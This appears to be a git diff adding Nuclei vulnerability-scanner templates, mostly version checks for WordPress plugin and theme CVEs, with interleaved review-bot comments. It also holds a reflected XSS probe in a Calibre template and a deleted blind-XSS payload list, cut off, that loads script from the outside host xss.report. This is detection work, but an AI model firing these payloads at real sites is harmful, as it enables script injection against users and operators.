+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/brizy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "brizy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.1')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6552.yaml b/nuclei-templates/CVE-2024/CVE-2024-6552.yaml
new file mode 100644
index 0000000000..8e1d60209a
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-6552.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6552
+
+info:
+ name: >
+ Booking for Appointments and Events Calendar – Amelia <= 1.2 - Unauthenticated Full Path Disclosure
+ author: topscoder
+ severity: medium
+ description: >
+ The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9aa2a44-5a71-4a10-9876-3d54b8d268c5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-6552
+ metadata:
+ fofa-query: "wp-content/plugins/ameliabooking/"
+ google-query: inurl:"/wp-content/plugins/ameliabooking/"
+ shodan-query: 'vuln:CVE-2024-6552'
+ tags: cve,wordpress,wp-plugin,ameliabooking,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ameliabooking/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ameliabooking"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6824.yaml b/nuclei-templates/CVE-2024/CVE-2024-6824.yaml
new file mode 100644
index 0000000000..12429e8bf1
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-6824.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6824
+
+info:
+ name: >
+ Premium Addons for Elementor <= 4.10.38 - Missing Authorization to Authenticated (Contributor+) Arbitrary Content Deletion and Arbitrary Title Update
+ author: topscoder
+ severity: low
+ description: >
+ The Premium Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'check_temp_validity' and 'update_template_title' functions in all versions up to, and including, 4.10.38. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary content and update post and page titles.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b2840b9e-1baf-460c-ba11-43e4279ece27?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-6824
+ metadata:
+ fofa-query: "wp-content/plugins/premium-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-6824'
+ tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "premium-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.10.38')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6869.yaml b/nuclei-templates/CVE-2024/CVE-2024-6869.yaml
new file mode 100644
index 0000000000..035e88b5c3
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-6869.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6869
+
+info:
+ name: >
+ Falang multilanguage for WordPress <= 1.3.52 - Missing Authorization to Translation Update and Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+ The Falang multilanguage for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.3.52. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete translations and expose the administrator email address.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd4d67cd-5fb0-425d-8b22-c69ebb0ffa72?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-6869
+ metadata:
+ fofa-query: "wp-content/plugins/falang/"
+ google-query: inurl:"/wp-content/plugins/falang/"
+ shodan-query: 'vuln:CVE-2024-6869'
+ tags: cve,wordpress,wp-plugin,falang,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/falang/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "falang"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.52')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6987.yaml b/nuclei-templates/CVE-2024/CVE-2024-6987.yaml
new file mode 100644
index 0000000000..ab95db0ed5
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-6987.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6987
+
+info:
+ name: >
+ Orchid Store <= 1.5.6 - Missing Authorization to Authenticated (Subscriber+) Limited Plugin Activation
+ author: topscoder
+ severity: low
+ description: >
+ The Orchid Store theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'orchid_store_activate_plugin' function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate the Addonify Floating Cart For WooCommerce plugin if it is installed.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5402f206-0375-4c47-8a5c-e8ea5742493d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-6987
+ metadata:
+ fofa-query: "wp-content/themes/orchid-store/"
+ google-query: inurl:"/wp-content/themes/orchid-store/"
+ shodan-query: 'vuln:CVE-2024-6987'
+ tags: cve,wordpress,wp-theme,orchid-store,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/orchid-store/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "orchid-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7008.yaml b/nuclei-templates/CVE-2024/CVE-2024-7008.yaml
new file mode 100644
index 0000000000..9d2e941294
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7008.yaml
@@ -0,0 +1,39 @@
+id: CVE-2024-7008
+
+info:
+ name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
+ reference:
+ - https://starlabs.sg/advisories/24/24-7008/
+ metadata:
+ verified: true
+ shodan-query: html:"Calibre"
+ fofa-query: "Server: calibre"
+ max-requeset: 1
+ tags: cve,cve2024,calibre,xss
+
+http:
+ - raw:
+ - |
+ GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ part: body
+ words:
+ - 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'
+
+ - type: status
+ status:
+ - 200
+# digest: 490a004630440220204753a269829273bf653d6bc90e49f892dbce2ee36a361edb1e33a0537442da02203a4a9991048fd3702d95471a875fb381c0fa628e090a0f4156c8f876dae1be48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7150.yaml b/nuclei-templates/CVE-2024/CVE-2024-7150.yaml
new file mode 100644
index 0000000000..24a797b9c2
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7150.yaml
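Review bot: The metadata key `max-requeset: 1` in the CVE-2024-7008 template is misspelled, so anything that reads the request count from `max-request` finds no value for this file; it should be `max-request: 1`. The `info` block also has no `classification` section, unlike the other templates in this commit, so the finding carries no `cve-id`, CVSS vector or score for reports that key on those fields. Adding `classification:` with `cve-id: CVE-2024-7008` would fix the first of these. The vector and score are not given anywhere in the hunk and would have to come from the advisory under `reference`.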
@@ -0,0 +1,59 @@
+id: CVE-2024-7150
+
+info:
+ name: >
+ Slider by 10Web – Responsive Image Slider <= 1.2.57 - Authenticated (Contributor+) SQL Injection via id Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The Slider by 10Web – Responsive Image Slider plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.2.57 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/74d635b6-2b4a-49af-af5c-6bfa1b5d220e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7150
+ metadata:
+ fofa-query: "wp-content/plugins/slider-wd/"
+ google-query: inurl:"/wp-content/plugins/slider-wd/"
+ shodan-query: 'vuln:CVE-2024-7150'
+ tags: cve,wordpress,wp-plugin,slider-wd,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/slider-wd/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "slider-wd"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.57')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7350.yaml b/nuclei-templates/CVE-2024/CVE-2024-7350.yaml
new file mode 100644
index 0000000000..7b36f4540d
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7350.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7350
+
+info:
+ name: >
+ Appointment Booking Calendar Plugin and Online Scheduling Plugin – BookingPress 1.1.6 - 1.1.7 - Authentication Bypass to Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+ The Appointment Booking Calendar Plugin and Online Scheduling Plugin – BookingPress plugin for WordPress is vulnerable to authentication bypass in versions 1.1.6 to 1.1.7. This is due to the plugin not properly verifying a user's identity prior to logging them in when completing a booking. This makes it possible for unauthenticated attackers to log in as registered users, including administrators, if they have access to that user's email. This is only exploitable when the 'Auto login user after successful booking' setting is enabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c367565-75f7-4dd7-a2f1-111df581bd7a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-7350
+ metadata:
+ fofa-query: "wp-content/plugins/bookingpress-appointment-booking/"
+ google-query: inurl:"/wp-content/plugins/bookingpress-appointment-booking/"
+ shodan-query: 'vuln:CVE-2024-7350'
+ tags: cve,wordpress,wp-plugin,bookingpress-appointment-booking,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bookingpress-appointment-booking/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bookingpress-appointment-booking"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '>= 1.1.6', '<= 1.1.7')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7486.yaml b/nuclei-templates/CVE-2024/CVE-2024-7486.yaml
new file mode 100644
index 0000000000..3462a19692
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7486.yaml
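Review bot: In CVE-2024-7350.yaml the result is decided only by `compare_versions(version, '>= 1.1.6', '<= 1.1.7')` on the `Stable tag` read from readme.txt, while the description says the flaw is exploitable only when 'Auto login user after successful booking' is enabled, a setting this single GET cannot observe. A hit reported at `severity: critical` therefore means that an affected release is installed, not that the site is confirmed exposed, and the template should say so. A comment above `http:` would do, for example `# version check only: does not verify that auto-login after booking is enabled`. CVE-2024-7492.yaml has the same gap for its multisite-only condition.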
@@ -0,0 +1,59 @@
+id: CVE-2024-7486
+
+info:
+ name: >
+ MultiPurpose <= 1.2.0 - Authenticated (Contributor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The MultiPurpose theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.0 via deserialization of untrusted input through the 'wpeden_post_meta' post meta. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e029bc15-8128-42d1-8874-b0689312cb35?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7486
+ metadata:
+ fofa-query: "wp-content/themes/multipurpose/"
+ google-query: inurl:"/wp-content/themes/multipurpose/"
+ shodan-query: 'vuln:CVE-2024-7486'
+ tags: cve,wordpress,wp-theme,multipurpose,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/multipurpose/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multipurpose"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7492.yaml b/nuclei-templates/CVE-2024/CVE-2024-7492.yaml
new file mode 100644
index 0000000000..e4de1c2c6a
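Review bot: The word matcher `"multipurpose"` together with the unanchored `(?mi)Version: ([0-9.]+)` is a weak fingerprint for this theme in CVE-2024-7486.yaml. Any 200 response whose body contains that common word and some `Version:` string would be reported, including a soft-404 or a page reached through a redirect, even when the theme is not installed. Anchoring the extractor to the start of a header line, e.g. `'(?mi)^[ \t/*#@]*Version:[ \t]*([0-9.]+)'` in single quotes, and matching on the stylesheet's `Theme Name:` header line instead of the slug would tighten it. The theme's real header is not visible in this commit, so the exact name string needs confirming. CVE-2024-7560.yaml (`news-flash`) and CVE-2024-7561.yaml (`the-next`) use the same pattern.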
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7492.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7492
+
+info:
+ name: >
+ MainWP Child Reports <= 2.2 - Cross-Site Request Forgery to Arbitrary Options Update
+ author: topscoder
+ severity: medium
+ description: >
+ The MainWP Child Reports plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd7971c-6f1c-437a-832c-e2b2817a197e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7492
+ metadata:
+ fofa-query: "wp-content/plugins/mainwp-child-reports/"
+ google-query: inurl:"/wp-content/plugins/mainwp-child-reports/"
+ shodan-query: 'vuln:CVE-2024-7492'
+ tags: cve,wordpress,wp-plugin,mainwp-child-reports,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mainwp-child-reports/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mainwp-child-reports"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2')
\ No newline at end of file
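Review bot: `redirects: true` with `max-redirects: 3` in CVE-2024-7492.yaml lets the request follow a redirect off the scanned host. When a target redirects the readme.txt path elsewhere, the extracted version and the finding are attributed to `{{BaseURL}}` although the body came from another site. Replacing it with `host-redirects: true` keeps the check on the host being assessed and avoids misattributed results in an asset inventory. The same two lines appear in every template this commit adds.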
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7548.yaml b/nuclei-templates/CVE-2024/CVE-2024-7548.yaml
new file mode 100644
index 0000000000..699d0334a5
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7548.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7548
+
+info:
+ name: >
+ LearnPress – WordPress LMS Plugin <= 4.2.6.9.3 - Authenticated (Contributor+) SQL Injection via order Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'order' parameter in all versions up to, and including, 4.2.6.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/702715a9-b180-4d31-a1df-37b732ae8226?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7548
+ metadata:
+ fofa-query: "wp-content/plugins/learnpress/"
+ google-query: inurl:"/wp-content/plugins/learnpress/"
+ shodan-query: 'vuln:CVE-2024-7548'
+ tags: cve,wordpress,wp-plugin,learnpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learnpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.6.9.3')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7560.yaml b/nuclei-templates/CVE-2024/CVE-2024-7560.yaml
new file mode 100644
index 0000000000..9503d325c0
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7560.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7560
+
+info:
+ name: >
+ News Flash <= 1.1.0 - Authenticated (Editor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The News Flash theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input from the newsflash_post_meta meta value. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5631826-6975-41e9-a896-f2aa0581334f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-7560
+ metadata:
+ fofa-query: "wp-content/themes/news-flash/"
+ google-query: inurl:"/wp-content/themes/news-flash/"
+ shodan-query: 'vuln:CVE-2024-7560'
+ tags: cve,wordpress,wp-theme,news-flash,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/news-flash/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "news-flash"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7561.yaml b/nuclei-templates/CVE-2024/CVE-2024-7561.yaml
new file mode 100644
index 0000000000..c464e22421
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-7561.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7561
+
+info:
+ name: >
+ The Next <= 1.1.0 - Authenticated (Contributor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The The Next theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input from the wpeden_post_meta post meta value. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76dcb33-4c6b-44dc-9b27-6daf4f0a1376?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7561
+ metadata:
+ fofa-query: "wp-content/themes/the-next/"
+ google-query: inurl:"/wp-content/themes/the-next/"
+ shodan-query: 'vuln:CVE-2024-7561'
+ tags: cve,wordpress,wp-theme,the-next,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/the-next/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-next"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/nuclei-templates/Other/0x71rex-blind-xss.yaml b/nuclei-templates/Other/0x71rex-blind-xss.yaml
deleted file mode 100644
index 3f6bcba7bb..0000000000
--- a/nuclei-templates/Other/0x71rex-blind-xss.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: blind-xss - -info: - name: Blind XSS - author: shelled - severity: medium - description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. - tags: xss,blind,generic - -requests: - - raw: - - | - GET {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: {{injection}} - - - payloads: - injection: - - '">' - - '">' - - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' - - '">' - - '">